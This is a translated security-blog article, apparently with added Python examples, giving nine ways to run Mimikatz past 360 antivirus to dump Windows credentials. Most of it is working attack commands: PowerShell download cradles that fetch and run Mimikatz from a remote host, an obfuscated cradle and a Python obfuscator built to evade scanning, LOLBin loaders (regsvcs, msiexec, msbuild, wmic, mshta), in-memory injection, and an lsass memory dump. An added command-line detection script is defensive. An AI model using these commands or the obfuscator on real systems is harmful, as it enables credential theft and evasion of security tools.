Nine ways to run Mimikatz
source link: http://www.freebuf.com/articles/web/176796.html?amp%3Butm_medium=referral
*Original author: R1ngk3y. This article belongs to the FreeBuf original-content reward program; reproduction without permission is prohibited.
Introduction
A few tricks collected over time for running mimikatz past antivirus; the bypass tests here use 360 as the target.
Download the latest version of 360:
An unmodified mimikatz binary is killed on sight.
Below, nine ways to get past 360 and dump credentials.
Technique 1 - PowerShell
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1
Run from cmd:
C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
It can also be loaded remotely:
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz
But 360 blocks this PowerShell command.
Simple obfuscation gets it through: the command is split into short quoted fragments joined with +, every single quote is replaced by the placeholder 1vc, and the fragments are reassembled at runtime with .Replace() before being piped to IEX:
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
Animated demo: http://ringk3y.com/wp-content/uploads/2018/07/1.gif
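To make clear what the one-liner above actually does, here is an added Python example (not code from the original post) that builds the same fragment/placeholder/.Replace()/IEX wrapper around any command and statically resolves it back to plain text. PAGE_ONELINER is the expression copied from the command above; the chunk size, the seed and the token name are this example's own choices. Nothing here executes PowerShell.

```python
"""Added example for Technique 1: build and statically resolve the
fragment-and-Replace obfuscation shown above. Does not run PowerShell."""
import random
import re

# Inner expression of the page's own one-liner (the part inside powershell -c "...").
PAGE_ONELINER = (
    "('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('"
    "+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'"
    "+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
)


def obfuscate(command: str, token: str = "1vc", max_chunk: int = 6, seed: int = 1) -> str:
    """Wrap `command` the way the page does: split it into short single-quoted
    fragments joined with '+', substitute `token` for every single quote, and
    append the runtime .Replace(token, [string][char]39) | IEX that restores the
    quotes and executes the result.  `token` must not already occur in `command`.
    Fragment boundaries are random (seeded so runs repeat) and may fall inside the
    token itself, as the page's 'ps11v'+'c)' shows; that is harmless because the
    Replace runs on the concatenated string, not on the fragments."""
    if token in command:
        raise ValueError("placeholder token occurs in the command; pick another")
    rng = random.Random(seed)
    masked = command.replace("'", token)
    pieces, i = [], 0
    while i < len(masked):
        n = rng.randint(1, max_chunk)
        pieces.append("'" + masked[i:i + n] + "'")
        i += n
    return "(" + "+".join(pieces) + f").REplaCE('{token}',[STRing][CHAR]39)|IeX"


_FRAGMENT = re.compile(r"'([^']*)'")
_WRAPPER = re.compile(
    r"^\((?P<body>.*)\)\.replace\('(?P<token>[^']+)',\[string\]\[char\](?P<code>\d+)\)\|iex$",
    re.IGNORECASE,
)


def deobfuscate(oneliner: str) -> str:
    """Resolve the wrapper statically: concatenate the quoted fragments in order,
    then undo the placeholder substitution using the code from [char]N."""
    m = _WRAPPER.match(oneliner.strip())
    if not m:
        raise ValueError("not the '(...).Replace(tok,[string][char]N)|IEX' shape")
    body = m.group("body")
    fragments = _FRAGMENT.findall(body)
    # refuse anything that is not purely quoted literals joined by '+'
    if "+".join("'" + f + "'" for f in fragments) != body:
        raise ValueError("body is not a plain '+' chain of string literals")
    return "".join(fragments).replace(m.group("token"), chr(int(m.group("code"))))


def literal_visible(oneliner: str, needle: str) -> bool:
    """True if a scanner matching `needle` as a substring of the raw command line would hit."""
    return needle.lower() in oneliner.lower()


if __name__ == "__main__":
    print(deobfuscate(PAGE_ONELINER))
    cmd = deobfuscate(PAGE_ONELINER)
    wrapped = obfuscate(cmd)
    print(wrapped)
    print("DownloadString visible:", literal_visible(wrapped, "DownloadString"))
```

The split only defeats substring matching on the command line, which is what 360 tripped on here; the reassembled string is still what IEX hands to the script-block scanner (AMSI on Windows 10), and the resolver above shows a defender can recover the original command without running it.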
Technique 2 - Loading mimikatz with .NET 2.0
Author: Casey Smith, Twitter: @subTee
Download:
https://gist.githubusercontent.com/nicholasmckinney/896b508b6cf1e8c3e567ccab29c8d3ec/raw/afa7219adbfcdfc160c163273ef8ec61ff0658b4/katz.cs
Place katz.cs in C:\Windows\Microsoft.NET\Framework\v2.0.50727
First run this in PowerShell to write out the strong-name key file key.snk that csc needs (the base64 key blob is not reproduced in this copy):
$key = '<base64 .snk key material omitted>'
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
Then from cmd, compile katz.cs with that key and load the resulting assembly through regsvcs.exe, a Microsoft-signed .NET utility, which is why it serves as the loader:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
Animated demo: http://ringk3y.com/wp-content/uploads/2018/07/1-1.gif
Technique 3 - Loading mimikatz from JScript
Built with DotNetToJScript:
https://github.com/tyranid/DotNetToJScript
The resulting katz.js (mimikatz serialized into JScript):
https://gist.github.com/500646/14051b27b45dce37818aca915e93062f/raw/2adcc9d2570b4367c6cc405e5a5969863d04fc9b/katz.js
Run it with cscript katz.js (the original post writes cscript mimikatz.js; use the name of the file you downloaded).
This method is now flagged as malicious by some AV products; for a bypass see:
https://evi1cg.me/archives/AMSI_bypass.html
Technique 4 - Loading mimikatz with msiexec
Author: homjxi0e
Download:
https://github.com/homjxi0e/PowerScript/blob/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi
Remote execution:
PS:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
cmd:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
Local execution:
msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi
Technique 5 - Loading mimikatz with .NET 4.0 (MSBuild inline task)
Author: subTee
Download mimikatz.xml:
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
Run:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimikatz.xml
Technique 6 - The XSL version of the JScript loader
Author: subTee
Download:
https://gist.github.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl
Load locally:
wmic os get /format:"mimikatz.xsl"
Load remotely:
wmic os get /format:"http://127.0.0.1/mimikatz.xsl"
Technique 7 - The SCT version of the JScript loader
Author: subTee
Download:
https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct
Run (mshta fetches the scriptlet and executes it):
mshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec();
The original then shows the mimikatz commands log, coffee and exit being issued (log writes output to a file, coffee is the built-in test command).
Technique 8 - Loading mimikatz in memory
Download:
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
Run (Invoke-ReflectivePEInjection fetches mimikatz.exe over HTTP and maps it into the PowerShell process without writing it to disk):
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR
Animated demo: http://ringk3y.com/wp-content/uploads/2018/07/1-2.gif
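Every one of Techniques 1 through 8 above leaves a distinctive process-creation command line, so here is an added Python example (not part of the original post) that flags those shapes in a tab-separated log of timestamp, image path and command line. The rules and the sample events are constructed for this page from the commands shown above, with a few benign lines mixed in; they are a starting point to tune, not a finished detection.

```python
"""Added example for Techniques 1-8: flag the LOLBin and PowerShell command-line
shapes used above in process-creation events. Rules and events are constructed."""
import re

# One rule per technique: (name, regex on the image path, regex on the command line).
RULES = [
    ("powershell_download_cradle", r"\\powershell\.exe$",
     r"downloadstring|invoke-expression|\biex\b|-e(xec|p|xecutionpolicy)?\s+bypass"),
    ("powershell_concat_replace_iex", r"\\powershell\.exe$",
     r"\.replace\('[^']+',\s*\[string\]\[char\]\d+\)\s*\|\s*iex"),
    ("csc_unsafe_or_keyfile", r"\\csc\.exe$", r"/unsafe\b|/keyfile:"),
    ("regsvcs_regasm_user_assembly", r"\\reg(svcs|asm)\.exe$", r"\s\S+\.(exe|dll)\b"),
    ("msiexec_install_from_url", r"\\msiexec\.exe$", r"/i\s+https?://"),
    ("msbuild_inline_task_xml", r"\\msbuild\.exe$", r"\S+\.xml\b"),
    ("wmic_format_xsl", r"\\wmic\.exe$", r'/format:"?(https?://|[^\s"]*\.xsl)'),
    ("mshta_inline_script", r"\\mshta\.exe$", r"(javascript|vbscript):|script:https?://"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]

# Constructed events (not real telemetry): the page's commands plus three benign lines.
SAMPLE_EVENTS = """\
2018-07-20T10:01:02\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell -c "('IEX '+'(Ne'+'w-O').REplaCE('1vc',[STRing][CHAR]39)|IeX"
2018-07-20T10:02:05\tC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe\tcsc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
2018-07-20T10:02:10\tC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe\tregsvcs.exe katz.exe
2018-07-20T10:03:30\tC:\\Windows\\System32\\msiexec.exe\tmsiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
2018-07-20T10:04:00\tC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe\tmsbuild.exe mimikatz.xml
2018-07-20T10:05:12\tC:\\Windows\\System32\\wbem\\WMIC.exe\twmic os get /format:"http://127.0.0.1/mimikatz.xsl"
2018-07-20T10:06:45\tC:\\Windows\\System32\\mshta.exe\tmshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec()
2018-07-20T10:08:00\tC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe\tmsbuild.exe C:\\src\\app\\app.csproj /t:Build
2018-07-20T10:09:00\tC:\\Windows\\System32\\wbem\\WMIC.exe\twmic os get Caption,Version
2018-07-20T10:10:00\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -NoProfile -File C:\\scripts\\inventory.ps1
"""


def parse_event(line: str):
    """'timestamp<TAB>image<TAB>commandline'; returns None for malformed lines."""
    parts = line.rstrip("\n").split("\t", 2)
    return tuple(parts) if len(parts) == 3 else None


def scan(lines):
    """Return (rule, timestamp, commandline) for every rule each event trips, in log order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        timestamp, image, cmdline = event
        for name, img_re, cmd_re in COMPILED:
            if img_re.search(image) and cmd_re.search(cmdline):
                hits.append((name, timestamp, cmdline))
    return hits


if __name__ == "__main__":
    for rule, ts, cmd in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{ts} {rule:32} {cmd[:70]}")
```

The image path, not the first token of the command line, decides which rule set applies, since the command line is attacker-controlled text; when the log source carries the PE's OriginalFileName (Sysmon event 1 does), match on that as well so a renamed copy of regsvcs.exe or mshta.exe still lands in the right rule.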
Technique 9 - Dumping the lsass process and reading passwords offline
Download procdump64.exe
Run (-ma writes a full memory dump, which sekurlsa needs):
procdump64.exe -accepteula -ma lsass.exe 1.dmp
The same can be done from Task Manager (right-click lsass.exe, Create dump file).
Then copy 1.dmp to your own machine and point mimikatz at it:
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
Summary
1. Comparing these methods, I personally still prefer dumping the lsass process memory and reading the passwords offline.
2. Remotely loading the mimikatz script with PowerShell also works for reading passwords; it is simple and convenient.